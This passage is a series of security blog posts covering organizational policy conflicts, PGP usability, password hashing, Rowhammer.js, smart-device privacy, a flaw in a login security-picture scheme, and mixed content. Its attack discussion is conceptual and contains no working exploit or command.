When departments work at cross-purposes

Back in August, we wrote about how self-discipline can be one of the hardest parts of security, as illustrated by Snowden and the NSA. Just recently, Salon published an article about similar issues that plagued the CIA during the Cold War: How to explain the KGB’s amazing success identifying CIA agents in the field?

So many of their agents were being uncovered by the Soviets that they assumed there must’ve been double agents…somewhere. Apparently there was a lot of inward-focused paranoia. The truth was a lot more mundane, but also very actionable — not only for the CIA, but for business in general: two departments (in this case, two agencies) in one organization with incompatible, non-coordinated policies:

So how, exactly, did Totrov reconstitute CIA personnel listings without access to the files themselves or those who put them together?

His approach required a clever combination of clear insight into human behavior, root common sense and strict logic.

In the world of secret intelligence the first rule is that of the ancient Chinese philosopher of war Sun Tzu: To defeat the enemy, you have above all to know yourself. The KGB was a huge bureaucracy within a bureaucracy — the Soviet Union. Any Soviet citizen had an intimate acquaintance with how bureaucracies function. They are fundamentally creatures of habit and, as any cryptanalyst knows, the key to breaking the adversary’s cipher is to find repetitions. The same applies to the parallel universe of human counterintelligence.

The difference between Totrov and his fellow citizens was that whereas others at home and abroad would assume the Soviet Union was somehow unique, he applied his understanding of his own society to a society that on the surface seemed unique, but which, in respect of how government worked, was not in fact that much different: the United States.

From an organizational point of view, what’s fascinating is that the problem came from two different agencies with different missions having incompatible, uncoordinated policies: policies for Foreign Service Officers and policies for CIA officers were different enough to allow the Soviet Union to identify individuals who were theoretically Foreign Service Officers but who did not receive the same treatment as actual Foreign Service Officers. Pay and policy differentials made it easy to separate actual Foreign Service Officers from CIA agents.

Thus one productive line of inquiry quickly yielded evidence: the differences in the way agency officers undercover as diplomats were treated from genuine foreign service officers (FSOs). The pay scale at entry was much higher for a CIA officer; after three to four years abroad a genuine FSO could return home, whereas an agency employee could not; real FSOs had to be recruited between the ages of 21 and 31, whereas this did not apply to an agency officer; only real FSOs had to attend the Institute of Foreign Service for three months before entering the service; naturalized Americans could not become FSOs for at least nine years but they could become agency employees; when agency officers returned home, they did not normally appear in State Department listings; should they appear they were classified as research and planning, research and intelligence, consular or chancery for security affairs; unlike FSOs, agency officers could change their place of work for no apparent reason; their published biographies contained obvious gaps; agency officers could be relocated within the country to which they were posted, FSOs were not; agency officers usually had more than one working foreign language; their cover was usually as a “political” or “consular” official (often vice-consul); internal embassy reorganizations usually left agency personnel untouched, whether their rank, their office space or their telephones; their offices were located in restricted zones within the embassy; they would appear on the streets during the working day using public telephone boxes; they would arrange meetings for the evening, out of town, usually around 7.30 p.m. or 8.00 p.m.; and whereas FSOs had to observe strict rules about attending dinner, agency officers could come and go as they pleased.

You don’t need to infiltrate the CIA if the CIA and the State Department can’t agree on how to treat their staff and what rules to apply!

One way of looking at the problem was that the diplomats had their own goals, and they set policies appropriate to those goals. By necessity, they didn’t actually know the overall goals of their own embassies. It’s not unusual for different subdivisions of an organization to have conflicting goals. The question is how to manage those tensions. What was the point of requiring a 9 year wait after naturalization before someone could work as a foreign service officer? A different executive agency, with higher needs for the integrity of its agents, didn’t consider the wait necessary. Eliminating the wait would’ve eliminated an obvious difference between agents and normal diplomats.

But are we sure the wait wasn’t necessary? It creates a large obstacle for our adversaries: they need to think 9 years ahead if they want to supply their own mole instead of turning one of our diplomats. On the other hand, it created too large an obstacle for ourselves.

Is it more important to defend against foreign agents or to create high-quality cover for our own agents? Two agencies disagreed and pursued their own interests without resolving the disagreement. Either policy could have been effective; having both policies was an information give-away.

How can this sort of issue arise for private businesses? Too often individual departments can set policies that come into conflict with one another. For instance, an IT department may with perfectly reasonable justification decide to standardize on a single browser. A second department decides to develop internal tools that rely on browser add-ons like ActiveX or Java applets. When a vulnerability is discovered in those add-ons to the standard browser, the organization finds it is now dependent on an inherently insecure tool. Neither department is responsible for the situation; both acted in good faith within their arena. The problem was caused by a lack of any one responsible for determining how to set policies for the best good of the organization as a whole.

Security policies need to be set to take all the organization’s goals into consideration; to do that, someone has to be looking at the whole picture.

PGP: Still hard to use after 16 years

Earlier this month, SC magazine ran an article about this tweet from Joseph Bonneau at the Electronic Frontier Foundation:

Email from Phil Zimmerman: “Sorry, but I cannot decrypt this message. I don’t have a version of PGP that runs on any of my devices”

PGP, short for Pretty Good Privacy, is an email encryption system invented by Phil Zimmerman in 1991. So why isn’t Zimmerman eating his own dog food?

“The irony is not lost on me,” he says in this article at Motherboard, which is about PGP’s usability problems. Jon Callas, former Chief Scientist at PGP, Inc., tweeted that “We have done a good job of teaching people that crypto is hard, but cryptographers think that UX is easy.” As a cryptographer, it would be easy to forget that 25% of people have math anxiety. Cryptographers are used to creating timing attack-resistant implementations of AES. You can get a great sense of what’s involved from this explanation of AES, which is illustrated with stick figures. The steps are very complicated. In the general population, surprisingly few people can follow complex written instructions.

All the way back in 1999, there was a paper presented at USENIX called “Why Johnny Can’t Encrypt: A Usability Evaluation of PGP 5.0.” It included a small study with a dozen reasonably intelligent people:

The user test was run with twelve different participants, all of whom were experienced users of email, and none of whom could describe the difference between public and private key cryptography prior to the test sessions. The participants all had attended at least some college, and some had graduate degrees. Their ages ranged from 20 to 49, and their professions were diversely distributed, including graphic artists, programmers, a medical student, administrators and a writer.

The participants were given 90 minutes to learn and use PGP, under realistic conditions:

Our test scenario was that the participant had volunteered to help with a political campaign and had been given the job of campaign coordinator (the party affiliation and campaign issues were left to the participant’s imagination, so as not to offend anyone). The participant’s task was to send out campaign plan updates to the other members of the campaign team by email, using PGP for privacy and authentication. Since presumably volunteering for a political campaign implies a personal investment in the campaign’s success, we hoped that the participants would be appropriately motivated to protect the secrecy of their messages…

After briefing the participants on the test scenario and tutoring them on the use of Eudora, they were given an initial task description which provided them with a secret message (a proposed itinerary for the candidate), the names and email addresses of the campaign manager and four other campaign team members, and a request to please send the secret message to the five team members in a signed and encrypted email. In order to complete this task, a participant had to generate a key pair, get the team members’ public keys, make their own public key available to the team members, type the (short) secret message into an email, sign the email using their private key, encrypt the email using the five team members’ public keys, and send the result. In addition, we designed the test so that one of the team members had an RSA key while the others all had Diffie-Hellman/DSS keys, so that if a participant encrypted one copy of the message for all five team members (which was the expected interpretation of the task), they would encounter the mixed key types warning message. Participants were told that after accomplishing that initial task, they should wait to receive email from the campaign team members and follow any instructions they gave.

If that’s mystifying, that’s the point. You can get a very good sense of how you would’ve done, and how much has changed in 16 years, by reading the Electronic Frontier Foundation’s guide to using PGP on a Mac. The study participants were given 90 minutes to complete the task.

Things went wrong immediately:

Three of the twelve test participants (P4, P9, and P11) accidentally emailed the secret to the team members without encryption. Two of the three (P9 and P11) realized immediately that they had done so, but P4 appeared to believe that the security was supposed to be transparent to him and that the encryption had taken place. In all three cases the error occurred while the participants were trying to figure out the system by exploring.

Cryptographers are absolutely right that cryptography is hard:

Among the eleven participants who figured out how to encrypt, failure to understand the public key model was widespread. Seven participants (P1, P2, P7, P8, P9, P10 and P11) used only their own public keys to encrypt email to the team members. Of those seven, only P8 and P10 eventually succeeded in sending correctly encrypted email to the team members before the end of the 90 minute test session (P9 figured out that she needed to use the campaign manager’s public key, but then sent email to the the entire team encrypted only with that key), and they did so only after they had received fairly explicit email prompting from the test monitor posing as the team members. P1, P7 and P11 appeared to develop an understanding that they needed the team members’ public keys (for P1 and P11, this was also after they had received prompting email), but still did not succeed at correctly encrypting email. P2 never appeared to understand what was wrong, even after twice receiving feedback that the team members could not decrypt his email.
Another of the eleven (P5) so completely misunderstood the model that he generated key pairs for each team member rather than for himself, and then attempted to send the secret in an email encrypted with the five public keys he had generated. Even after receiving feedback that the team members were unable to decrypt his email, he did not manage to recover from this error.

The user interface can make it even harder:

P7 gave up on using the key server after one failed attempt in which she tried to retrieve the campaign manager’s public key but got nothing back (perhaps due to mis-typing the name). P1 spent 25 minutes trying and failing to import a key from an email message; he copied the key to the clipboard but then kept trying to decrypt it rather than import it. P12 also had difficulty trying to import a key from an email message: the key was one she already had in her key ring, and when her copy and paste of the key failed to have any effect on the PGPKeys display, she assumed that her attempt had failed and kept trying. Eventually she became so confused that she began trying to decrypt the key instead.

This is all so frustrating and unpleasant for people that they simply won’t use PGP. We actually have a way of encrypting email that’s not known to be breakable by the NSA. In practice, the human factors are even more difficult than stumping the NSA’s cryptographers!

Complexity and Storage Slow Attackers Down

Back in 2013, WhiteHat founder Jeremiah Grossman forgot an important password, and Jeremi Gosney of Stricture Consulting Group helped him crack it. Gosney knows password cracking, and he’s up for a challenge, but he knew it’d be futile trying to crack the leaked Ashley Madison passwords. Dean Pierce gave it a shot, and Ars Technica provides some context.

Ashley Madison made mistakes, but password storage wasn’t one of them. This is what came of Pierce’s efforts:

After five days, he was able to crack only 4,007 of the weakest passwords, which comes to just 0.0668 percent of the six million passwords in his pool.

It’s like Jeremiah said after his difficult experience:

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity. I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Imagine the average person that doesn’t even work in IT! Logging in to a website feels simpler than it is. It feels like, “The website checked my password, and now I’m logged in.”

Actually, “being logged in” means that the server gave your browser a secret number, AND your browser includes that number every time it makes a request, AND the server has a table of which number goes with which person, AND the server sends you the right stuff based on who you are. Usernames and passwords have to do with whether the server gives your browser the secret number in the first place.

It’s natural to assume that “checking your password” means that the server knows your password, and it compares it to what you typed in the login form. By now, everyone has heard that they’re supposed to have an impossible-to-remember password, but the reasons aren’t usually explained – people have their own problems besides the finer points of PBKDF2 vs. bcrypt).

If you’ve never had to think about it, it’s also natural to assume that hackers guessing your password are literally trying to log in as you. Even professional programmers can make that assumption, when password storage is outside their area of expertise. Our clients’ developers sometimes object to findings about password complexity or other brute force issues because they throttle login attempts, lock accounts after 3 incorrect guesses, etc. If that were true, hackers would be greatly limited by how long it takes to make each request over the network. Account lockouts are probably enough to discourage a person’s acquaintances, but they aren’t a protection against offline password cracking.

Password complexity requirements (include mixed case, include numbers, include symbols) are there to protect you once an organization has already been compromised (like Ashley Madison). In that scenario, password complexity is what you can do to help yourself. Proper password storage is what the organization can do. The key to that is in what exactly “checking your password” means.

When the server receives your login attempt, it runs your password through something called a hash function. When you set your password, the server ran your password through the hash function and stored the result, not your password. The server should only keep the password long enough to run it through the hash function. The difference between secure and insecure password storage is in the choice of hash function.

If your enemy is using brute force against you and trying every single thing, your best bet is to slow them down. That’s the thinking behind account lockouts and the design of functions like bcrypt. Running data through a hash function might be fast or slow, depending on the hash function. They have many applications. You can use them to confirm that large files haven’t been corrupted, and for that purpose it’s good for them to be fast. SHA256 would be a hash function suitable for that.

A common mistake is using a deliberately fast hash function, when a deliberately slow one is appropriate. Password storage is an unusual situation where we want the computation to be as slow and inefficient as practicable.

In the case of hackers who’ve compromised an account database, they have a table of usernames and strings like “$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy”. Cracking the password means that they make a guess, run it through the hash function, and get the same string. If you use a complicated password, they have to try more passwords. That’s what you can do to slow them down. What organizations can do is to choose a hash function that makes each individual check very time-consuming. It’s cryptography, so big numbers are involved. The “only” thing protecting the passwords of Ashley Madison users is that trying a fraction of the possible passwords is too time-consuming to be practical.

Consumers have all the necessary information to read about password storage best practices and pressure companies to use those practices. At least one website is devoted to the cause. It’s interesting that computers are forcing ordinary people to think about these things, and not just spies.

The Death of the Full Stack Developer

When I got started in computer security, back in 1995, there wasn’t much to it — but there wasn’t much to web applications themselves. If you wanted to be a web application developer, you had to know a few basic skills. These are the kinds of things a developer would need to build a somewhat complex website back in the day:

  • ISP/Service Provider
  • Switching and routing with ACLs
  • DNS
  • Telnet
  • *NIX
  • Apache
  • vi/Emacs
  • HTML
  • CGI/Perl/SSI
  • Berkley Database
  • Images

It was a pretty long list of things to get started, but if you were determined and persevered, you could learn them in relatively short order. Ideally you might have someone who was good at networking and host security to help you out if you wanted to focus on the web side, but doing it all yourself wasn’t unheard of. It was even possible to be an expert in a few of these, though it was rare to find anyone who knew all of them.

Things have changed dramatically over the 20 years that I’ve been working in security. Now this is what a fairly common stack and provisioning technology might consist of:

  • Eclipse
  • Github
  • Docker
  • Jenkins
  • Cucumber
  • Gauntlt
  • Amazon EC2
  • Amazon AMI
  • SSH keys
  • Duosec 2FA
  • WAF
  • IDS
  • Anti-virus
  • DNS
  • DKIM
  • SPF
  • Apache
  • Relational Database
  • Amazon Glacier
  • PHP
  • Apparmor
  • Suhosin
  • WordPress CMS
  • WordPress Plugins
  • API to WordPress.org for updates
  • API to anti-spam filter ruleset
  • API to merchant processor
  • Varnish
  • Stunnel
  • SSL/TLS Certificates
  • Certificate Authority
  • CDN
  • S3
  • JavaScript
  • jQuery
  • Google Analytics
  • Conversion tracking
  • Optimizely
  • CSS
  • Images
  • Sprites

Unlike before, there is literally no one on earth who could claim to understand every aspect of each of those things. They may be familiar with the concepts, but they can’t know all of these things all at once, especially given how quickly technologies change. Since there is no one who can understand all of those things at once, we have seen the gradual death of the full-stack developer.

It stands to reason, then, that there has been a similar decline in the numbers of full-stack security experts. People may know quite a bit about a lot of these technologies, but when it comes down to it, there’s a very real chance that any single security person will become more and more specialized over time — it’s simply hard to avoid specialization, given the growing complexity of modern apps. We may eventually see the death of the full-stack security person as well as a result.

If that is indeed the case, where does this leave enterprises that need to build secure and operationally functional applications? It means that there will be more and more silos where people will handle an ever-shrinking set of features and functionality in progressively greater depth. It means that companies that can augment security or operations in one or more areas will be adopted because there will be literally no other choice; failure to use a diverse and potentially external expertise in security/operations will ensure sec-ops failure.

At its heart, this is a result of economic forces – more code needs to be delivered and there are fewer people who understand what it’s actually doing. So outsource what you can’t know since there is too much for any one person to know about their own stack. This leads us back to the Internet Services Supply Chain problem as well – can you really trust your service providers when they have to trust other services providers and so on? All of this highlights the need for better visibility into what is really being tested, as well as the need to find security that scales and to implement operational hardware and software that is secure by default.

Developers and Security Tools

A recent study from NC State states that, “the two things that were most strongly associated with using security tools were peer influence and corporate culture. As a former developer, and as someone who has reviewed the source code of countless web applications, I can say these tools are almost impossible to use for the average developer. Security tools are invariably written for security experts and consultants. Tools produce a huge percentage of false alarms – if you are lucky, you will comb through 100 false alarms to find one legitimate issue.

The false assumption here is that running a tool will result in better security. Peer pressure to do security doesn’t quite make sense because most developers are not trained in security. And since the average tool produces a large number of false alarms, and since the pressure to ship new features as quickly as possible is so high, there will never be enough time, training or background for the average developer to effectively evaluate their own security.

The “evangelist” model the study mentions does seem to work well among some of the WhiteHat Security clients. Anecdotally, I know many organizations that will accept one volunteer per security group as a security “marshall” (something similar akin to a floor “fire marshall”). That volunteer receives special security training, but ultimately acts as a bridge between his or her individual development team and the security team.

Placing the burden of security entirely on the developers is unfair, as is making them choose between fixing vulnerabilities and shipping new code. One of the dirty secrets of technology is this: even though developers often are shouldered with the responsibility of security, risk and security are really business decisions. Security is also a process that goes far beyond the development process. Developers cannot be solely responsible for application security. Business analysts, architects, developers, quality assurance, security teams, and operations all play a critical role in managing technology risk. And above all, managers (including the C-level team) must provide direction, set levels or tolerable risk, and it is ultimately responsible for making the decision to ship new code or fix vulnerabilities. That is ultimately a business decision.

It Can Happen to Anyone

Earlier this summer, The Intercept published some details about the NSA’s XKEYSCORE program. Those details included some security issues around logging and authorization:

As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to ensure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

These are exactly the same kinds of problems that led to the Snowden leaks:

As a system administrator, Snowden was allowed to look at any file he wanted, and his actions were largely unaudited. “At certain levels, you are the audit,” said an intelligence official.

He was also able to access NSAnet, the agency’s intranet, without leaving any signature, said a person briefed on the postmortem of Snowden’s theft. He was essentially a “ghost user,” said the source, making it difficult to trace when he signed on or what files he accessed.

If he wanted, he would even have been able to pose as any other user with access to NSAnet, said the source.

The NSA obviously had the in-house expertise to design the system differently. Surely they know the importance of logging from their own experience hacking things and responding to breaches. How could this happen?

The most cynical explanation is that the point is not to log everything. Plausible deniability is a goal of intelligence agencies. Nobody can subpoena records that don’t exist. The simple fact of tracking an individual can be highly sensitive (e.g., foreign heads of state).

There’s also a simpler explanation: basic organizational problems. From the same NBC News article:

It’s 2013 and the NSA is stuck in 2003 technology,” said an intelligence official.

Jason Healey, a former cyber-security official in the Bush Administration, said the Defense Department and the NSA have “frittered away years” trying to catch up to the security technology and practices used in private industry. “The DoD and especially NSA are known for awesome cyber security, but this seems somewhat misplaced,” said Healey, now a cyber expert at the Atlantic Council. “They are great at some sophisticated tasks but oddly bad at many of the simplest.

In other words, lack of upgrades, “not invented here syndrome,” outsourcing with inadequate follow-up and accountability, and other familiar issues affect even the NSA. Very smart groups of people have these issues, even when they understand them intellectually.

Each individual department of the NSA probably faces challenges very similar to those of a lot of software companies: things need to be done yesterday, and done cheaper. New features are prioritized above technical debt. “It’s just an internal system, and we can trust our own people, anyway…”

Security has costs. Those costs include money, time, and convenience — making a system secure creates obstacles, so there’s always a temptation to ignore security “just this once,” “just for this purpose,” “just for now.” Security is a game in which the adversary tests your intelligence and creativity, yes; but most of all, the adversary tests your thoroughness and your discipline.

Conspiracy Theory and the Internet of Things

I came across this article about smart devices on Alternet, which tells us that “we are far from a digital Orwellian nightmare.” We’re told that worrying about smart televisions, smart phones, and smart meters is for “conspiracy theorists.”

It’s a great case study in not having a security mindset.

This is what David Petraeus said about the Internet of Things at the In-Q-Tel CEO summit in 2012, while he was head of the CIA:

Items of interest will be located, identified, monitored, and remotely controlled through technologies such as radio-frequency identification, sensor networks, tiny embedded servers, and energy harvesters—all connected to the next-generation Internet using abundant, low cost, and high-power computing—the latter now going to cloud computing, in many areas greater and greater supercomputing, and, ultimately, heading to quantum computing.

In practice, these technologies could lead to rapid integration of data from closed societies and provide near-continuous, persistent monitoring of virtually anywhere we choose. “Transformational” is an overused word, but I do believe it properly applies to these technologies, particularly to their effect on clandestine tradecraft. Taken together, these developments change our notions of secrecy and create innumerable challenges—as well as opportunities.

In-Q-Tel is a venture capital firm that invests “with the sole purpose of delivering these cutting-edge technologies to IC [intelligence community] end users quickly and efficiently.” Quickly means 3 years, for their purposes.

It’s been more than 3 years since Petraeus made those remarks. “Is the CIA meeting its stated goals?” is a fair question. Evil space lizards are an absurd conspiracy theory, for comparison.

Smart Televisions

The concerns are confidently dismissed:

Digital Trends points out that smart televisions aren’t “always listening” as they are being portrayed in the media. In fact, such televisions are asleep most of the time, and are only awaken [sic] when they hear a pre-programmed phrase like “Hi, TV.” So, any conversation you may be having before waking the television is not captured or reported. In fact, when the television is listening, it informs the user it is in this mode by beeping and displaying a microphone icon. And when the television enters into listening mode, it doesn’t comprehend anything except a catalog of pre-programmed, executable commands.

Mistaken assumption: gadgets work as intended.

Here’s a Washington Post story from 2013:

The FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years, and has used that technique mainly in terrorism cases or the most serious criminal investigations, said Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, now on the advisory board of Subsentio, a firm that helps telecommunications carriers comply with federal wiretap statutes.

Logically speaking, how does the smart TV know it’s heard a pre-programmed phrase? The microphone must be on so that ambient sounds and the pre-programmed phrases can be compared. We already know the device can transmit data over the internet. The issue is whether or not data can be transmitted at the wrong time, to the wrong people. What if there was a simple bug that kept the microphone from shutting off, once it’s turned on? That would be analogous to insufficient session expiration in a web app, which is pretty common.

The author admits that voice data is being sent to servers advanced enough to detect regional dialects. A low-profile third party contractor has the ability to know whether someone with a different accent is in your living room:

With smart televisions, some information, like IP address and other stored data may be transmitted as well. According to Samsung, its speech recognition technology can also be used to better recognize regional dialects and accents and other things to enhance the user experience. To do all these things, smart television makers like Samsung must employ third-party applications and servers to help them decipher the information it takes in, but this information is encrypted during transmission and not retained or for sale, at least according to the company’s privacy policy.

Can we trust that the encryption is done correctly, and nobody’s stolen the keys? Can we trust that the third parties doing natural language processing haven’t been compromised?

Smart Phones

The Alternet piece has an anecdote of someone telling the author to “Never plug your phone in at a public place; they’ll steal all your information.” Someone can be technically unsophisticated but have the right intuitions. The man doesn’t understand that his phone broadcasts radio waves into the environment, so he has an inaccurate mental model of the threat. He knows that there is a threat.

Then this passage:

A few months back, a series of videos were posted to YouTube and Facebook claiming that the stickers affixed to cellphone batteries are transmitters used for data collection and spying. The initial video showed a man peeling a Near Field Communication transmitter off the wrapper on his Samsung Galaxy S4 battery. The person speaking on the video claims this “chip” allows personal information, such as photographs, text messages, videos and emails to be shared with nearby devices and “the company.” He recommended that the sticker be removed from the phone’s battery….

And that sticker isn’t some nefarious implant the phone manufacturer uses to spy on you; it’s nothing more than a coil antenna to facilitate NFC transmission. If you peel this sticker from your battery, it will compromise your smartphone and likely render it useless for apps that use NFC, like Apple Pay and Google Wallet.

As Ars Technica put it in 2012:

By exploiting multiple security weakness in the industry standard known as Near Field Communication, smartphone hacker Charlie Miller can take control of handsets made by Samsung and Nokia. The attack works by putting the phone a few centimeters away from a quarter-sized chip, or touching it to another NFC-enabled phone. Code on the attacker-controlled chip or handset is beamed to the target phone over the air, then opens malicious files or webpages that exploit known vulnerabilities in a document reader or browser, or in some cases in the operating system itself.

Here, the author didn’t imagine a scenario where a someone might get a malicious device within a few centimeters of his phone. “Can I borrow your phone?” “Place all items from your pockets in the tray before stepping through the security checkpoint.” “Scan this barcode for free stuff!”

Smart Meters

Finally, the Alternet piece has this to say about smart meters:

In recent years, privacy activists have targeted smart meters, saying they collect detailed data about energy consumption. These conspiracy theorists are known to flood public utility commission meetings, claiming that smart meters can do a lot of sneaky things like transmit the television shows they watch, the appliances they use, the music they listen to, the websites they visit and their electronic banking use. They believe smart meters are the ultimate spying tool, making the electrical grid and the utilities that run it the ultimate spies.

Again, people can have the right intuitions about things without being technical specialists. That doesn’t mean their concerns are absurd:

The SmartMeters feature digital displays, rather than the spinning-usage wheels seen on older electromagnetic models. They track how much energy is used and when, and transmit that data directly to PG&E. This eliminates the need for paid meter readers, since the utility can immediately access customers’ usage records remotely and, theoretically, find out whether they are consuming, say, exactly 2,000 watts for exactly 12 hours a day.

That’s a problem, because usage patterns like that are telltale signs of indoor marijuana grow operations, which will often run air or water filtration systems round the clock, but leave grow lights turned on for half the day to simulate the sun, according to the Silicon Valley Americans for Safe Access, a cannabis users’ advocacy group.

What’s to stop PG&E from sharing this sensitive information with law enforcement? SmartMeters “pose a direct privacy threat to patients who … grow their own medicine,” says Lauren Vasquez, Silicon Valley ASA’s interim director. “The power company may report suspected pot growers to police, or the police may demand that PG&E turn over customer records.”

Even if you’re not doing anything ambiguously legal, the first thing that you do when you get home is probably turning the lights on. Different appliances use different amounts of power. By reporting power consumption at higher intervals, smart meters can give away a lot about what’s going on in a house.


That’s not the same as what you were watching on TV, but the content of phone conversations isn’t all that’s interesting about them, either.

It’s hard to trust things.

Hammering at speed limits

Slate has a well-written article explaining an interesting new vulnerability called “Rowhammer.” The white paper is here, and the code repository is here. Here’s the abstract describing the basic idea:

As DRAM has been scaling to increase in density, the cells are less isolated from each other. Recent studies have found that repeated accesses to DRAM rows can cause random bit flips in an adjacent row, resulting in the so called Rowhammer bug. This bug has already been exploited to gain root privileges and to evade a sandbox, showing the severity of faulting single bits for security. However, these exploits are written in native code and use special instructions to flush data from the cache.

In this paper we present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

What’s interesting to me is how much computers had to advance to make this situation possible. First, RAM had to be miniaturized enough that adjacent memory cells can interfere with one another. The RAM’s refresh rate had to be optimally low, because refreshing memory use up time and power.

Lots more had to happen before this was remotely exploitable via JavaScript. JavaScript wasn’t designed to quickly process binary data, or really even deal with binary data. It’s a high-level language without pointers or direct memory access. Semantically, JavaScript arrays aren’t contiguous blocks of memory like C arrays. They’re special objects whose keys happen to be integers. The third and fourth entries of an array aren’t necessarily next to each other in memory, and each item in an array might have a different type.

Typed Arrays were introduced for performance reasons, to facilitate working with binary data. They were especially necessary for allowing fast 3D graphics with WebGL. Typed Arrays do occupy adjacent memory cells, unlike normal arrays.

In other words, computers had to get faster, websites had to get fancier, and performance expectations had to go up.

Preventing the attack would kill performance at a hardware level: the RAM would have to spend up to 35% of its time refreshing itself. Short of hardware changes, the authors suggest that browser vendors implement tests for the vulnerability, then throttle JavaScript performance if the system is found to be vulnerable. JavaScript should have to be actively enabled by the user when they visit a website.

It seems unlikely that browser vendors are going to voluntarily undo all the work they’ve done, but they could. It would be difficult to explain to the “average person” that their computer needs to slow down because of some “Rowhammer” business. Rowhammer exists because both hardware and software vendors listened to consumer demands for higher performance. We could slow down, but it’s psychologically intolerable. The known technical solution is emotionally unacceptable to real people, so more advanced technical solutions will be attempted.

In a very similar way, we could make a huge dent in pollution and greenhouse gas emissions if we slowed down our cars and ships by half. For the vast majority of human history, we got by and nobody could travel close to 40 mph, let alone 80 mph.

When you really have information that people want, the safest thing is probably just to use typewriters. Russia already does, and Germany has considered it.

The solutions to security problems have to be technically correct and psychologically acceptable, and it’s the second part that’s hard.

Security Pictures

Security pictures are being used in a multitude of web applications to apply an extra step in securing the login process. However, are these security pictures being used properly? Could the use of security pictures actually aid hackers? Such questions passed through my mind when testing an application’s login process that relied on security pictures to provide an extra layer of security.

I was performing a business logic assessment for an insurance application that used security pictures as part of its login process, but something seemed off. The first step was to enter your username; if the username was found in the database then you would be presented with your security picture e.g. a dog, cat, iguana. If the username was not in the database then a message saying that you haven’t setup your security picture yet was displayed. Besides the clear potential for a brute force attack on usernames, there was another vulnerability hiding – you could view other users’ security pictures just by guessing the usernames in the first step.

Before I started to dwell into how should I classify the possible vulnerability in my assessment, I had to do some quick research in a couple of topics: what are security pictures used for? And, how do other applications use them effectively?

I always wondered what extra security the picture added. How could a picture of an iguana I chose protect me from danger at all? Or add an extra layer of security when I log in? Security pictures are mainly used to protect users from phishing attacks. For example, if an attacker tries to reproduce a banking login screen, a target user who is accustomed to see an iguana picture before entering his or her password would pause for a moment, then notice that something is not right since Iggy isn’t there anymore. The absence of a security picture produces that mental pause causing the user in most cases to not enter their password.

After finding about the true purpose of security pictures, I had to see how other applications use them in a less broken way. So I visited my bank’s website, entered my username, but instead of having my security picture displayed right away I was asked to answer my security question. Once the secret answer was entered my security picture would be displayed on top of the password input field. This approach to use a security picture was secure.

What seemed off in the beginning was the fact that because attackers can get users security pictures with a brute force attack, they can go a step further into phishing and use the security pictures of target users to create an even stronger phishing attack. This enhanced phishing attack would reassure the victim that they are in the right website because their security picture is there as usual.

Now that is clear that the finding was indeed a vulnerability, I had to think about how to classify it and what score to award. I classified it as Abuse of Functionality since WhiteHat Security defines Abuse of Functionality as:

“Abuse of Functionality is an attack technique that uses a web site’s own features and functionality to attack itself or others. Abuse of Functionality can be described as the abuse of an application’s intended functionality to perform an undesirable outcome. These attacks have varied results such as consuming resources, circumventing access controls, or leaking information. The potential and level of abuse will vary from web site to web site and application to application. Abuse of functionality attacks are often a combination of other attack types and/or utilize other attack vectors.”

In this case an attacker could use the application’s own authentication functionality to attack other users by combining the results of a brute force attack and the security pictures to create a powerful phishing attack. For the scores I have chosen to use Impact and Likelihood, which are given low, medium, and high values. Impact determines the potential damage a vulnerability inflicts and Likelihood estimates how likely it is for the vulnerability to be exploited. In terms of Likelihood, I would rate this a medium because it is very time consuming to setup a phishing attack and you will have to perform a brute force attack first to obtain valid usernames, then pick from the usernames the specific victims to attack; As for Impact, I would categorize this as high because once the phishing attack is sent the victim would most likely lose his or her credentials.

Security pictures can indeed help you add an extra layer of security to your application’s login process. However, put on your black hat for a moment and think how could a hacker use your own security against the application? As presented here, sometimes the medicine can be worse than the disease.

Why is Passive Mixed Content so serious?

One of the most important tools in web security is Transport Layer Security (TLS). It not only protects sensitive information during transit, but also verifies that the content has not been modified. The user can be confident that content delivered via HTTPS is exactly what the website sent. The user can exchange sensitive information with the website, secure in the knowledge that it won’t be altered or intercepted. However, this increase in security comes with an increased overhead cost. It is tempting to be concerned only about encryption and ignore the necessity to validate on both ends, but any resources that are called on a secure page should be similarly protected, not just the ones containing secret content.

Most web security professionals agree that active content — JavaScript, Flash, etc. — should only be sourced in via HTTPS. After all, an attacker can use a Man-in-the-Middle attack to replace non-secure content on the fly. This is clearly a security risk. Active content has access to the content of the Document Object Model (DOM), and the means to exfiltrate that data. Any attack that is possible with Cross-Site Scripting is also achievable using active mixed content.

The controversy begins when the discussion turns to passive content — images, videos, etc. It may be difficult to imagine how an attacker could inflict anything worse than mild annoyance by replacing such content. There are two attack scenarios which are commonly cited.

An unsophisticated attacker could, perhaps, damage the reputation of a company by including offensive or illegal content. However, the attack would only be effective while the attacker maintains a privileged position on the network. If the user moves to a different Wi-Fi network, the attacker is out of the loop. It would be easy to demonstrate to the press or law enforcement that the company is not responsible, so the impact would be negligible.
